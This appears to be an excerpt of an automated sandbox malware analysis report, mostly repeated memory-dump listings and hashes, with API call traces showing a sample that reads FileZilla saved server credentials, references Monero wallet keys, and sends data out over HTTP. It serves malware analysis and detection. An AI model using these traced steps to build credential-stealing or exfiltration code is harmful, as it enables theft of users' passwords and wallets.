                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                            • Instruction ID: e433bb699a1d0517315c9757631034bec06802625470b55d461a447b12d59662
                            • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                            • Instruction Fuzzy Hash: 12B18072A083115BD308CF25C89175BF7E2EFC8310F1AC93EF89997295D7B8D9459A82
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                            • Instruction ID: 9f9fbe277673128f2b8d027a26c905837e7d2072c07cf5caadab6de103c4cccc
                            • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                            • Instruction Fuzzy Hash: 92B12871E097118FD706EE3DC491229F7E1AFE6280F51C72EE895B7662EB71E8818740
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                            • Instruction ID: 874a1514973fab5eed9bb143996e6ac37a280d8b17ea726855f7dd45d2247fbc
                            • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                            • Instruction Fuzzy Hash: B191E671B002118BDF15CF68DC80BBAB3A0AF55700F994564FD18AB3A2D372DD85C7A1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                            • Instruction ID: 4817fa5d5e290dfbcb71002625302629aa52737d963fe24c1df08b709d94d262
                            • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                            • Instruction Fuzzy Hash: F2B14B31610609DFDB19CF28C48AB647BE0FF45369F29865CE8A9CF2A2C335D995CB41
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                            • Instruction ID: 700040f8bdb169dd73a10ff5f1d431d258df612d43d849fd722c16e20fc36da2
                            • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                            • Instruction Fuzzy Hash: BEC14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E9A6CF81
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                            • Instruction ID: fdf23e2d91c9e6ab4ca03c847bf601cc2d1e67a5c593085d59805ada574f5f57
                            • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                            • Instruction Fuzzy Hash: EB917A30828790AAEB168B3CEC427BAF764FFE6350F14C31AF99872491FB7195848344
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction ID: 03f9f7305a457511786d11f10a6f263ad0d47cbd8e77e08b6ede81ac38807da4
                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction Fuzzy Hash: A8A13E72A00A19CBEB19CF55DCD1A9EBBB1FB58314F19C22AD41AE77A0D334A944CF50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction ID: 0efc909a6c9b61422e5137c48506721c759508487037a2e549eaeb220d4beccd
                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction Fuzzy Hash: 32A16E72E083119BD308CF25C89075BF7E2EFC8710F1ACA3DA8A997254D774E9419B82
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • GetProcessHeap.KERNEL32(00000000,000F423F,000F0DBF,000F0DBE,000F0DBB,000F0DBA), ref: 000E04C2
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E04C9
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 000E04E5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E04F3
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 000E052F
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E053D
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 000E0579
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E0587
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000E05C3
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E05D5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E0662
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E067A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E0692
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E06AA
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000E06C2
                            • lstrcat.KERNEL32(?,profile: null), ref: 000E06D1
                            • lstrcat.KERNEL32(?,url: ), ref: 000E06E0
                            • lstrcat.KERNEL32(?,00000000), ref: 000E06F3
                            • lstrcat.KERNEL32(?,000F1770), ref: 000E0702
                            • lstrcat.KERNEL32(?,00000000), ref: 000E0715
                            • lstrcat.KERNEL32(?,000F1774), ref: 000E0724
                            • lstrcat.KERNEL32(?,login: ), ref: 000E0733
                            • lstrcat.KERNEL32(?,00000000), ref: 000E0746
                            • lstrcat.KERNEL32(?,000F1780), ref: 000E0755
                            • lstrcat.KERNEL32(?,password: ), ref: 000E0764
                            • lstrcat.KERNEL32(?,00000000), ref: 000E0777
                            • lstrcat.KERNEL32(?,000F1790), ref: 000E0786
                            • lstrcat.KERNEL32(?,000F1794), ref: 000E0795
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E07EE
                            Strings
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: fca194ce6e5a6e0ebde2c49fc53b310e61ee5934f34d5d06aa1c033cc04c60a9
                            • Instruction ID: 06c3fd0304c9d245fcf0a9c3fddb9c81fe3754376017cf670c178fba846c6eab
                            • Opcode Fuzzy Hash: fca194ce6e5a6e0ebde2c49fc53b310e61ee5934f34d5d06aa1c033cc04c60a9
                            • Instruction Fuzzy Hash: A0D12D72E04248AFDB04EBE1DD96EEE7379AF1A300F408554F206B6092DF74BA44CB61
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D5A48
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D5A63
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D5BE3
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D4E768,00000000,?,00D4A8D0,00000000,?,000F1B4C), ref: 000D5EC1
                            • lstrlen.KERNEL32(00000000), ref: 000D5ED2
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 000D5EE3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D5EEA
                            • lstrlen.KERNEL32(00000000), ref: 000D5EFF
                            • lstrlen.KERNEL32(00000000), ref: 000D5F28
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D5F41
                            • lstrlen.KERNEL32(00000000,?,?), ref: 000D5F6B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D5F7F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000D5F9C
                            • InternetCloseHandle.WININET(00000000), ref: 000D6000
                            • InternetCloseHandle.WININET(00000000), ref: 000D600D
                            • HttpOpenRequestA.WININET(00000000,00D4E7B8,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D5C48
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • InternetCloseHandle.WININET(00000000), ref: 000D6017
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: f75553cabb5de87e096e8183e2a23f135286e6171f5165157abe3c3da8d01a9f
                            • Instruction ID: e7aa12c291705691cfe4e1fff03b9d4e98e439cbbcb6b43e2dfcf6c86a971aca
                            • Opcode Fuzzy Hash: f75553cabb5de87e096e8183e2a23f135286e6171f5165157abe3c3da8d01a9f
                            • Instruction Fuzzy Hash: 7412ED72A20158AFCB15EBA1DCA5FEEB379BF19700F114199B10676193DF703A48CB61
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
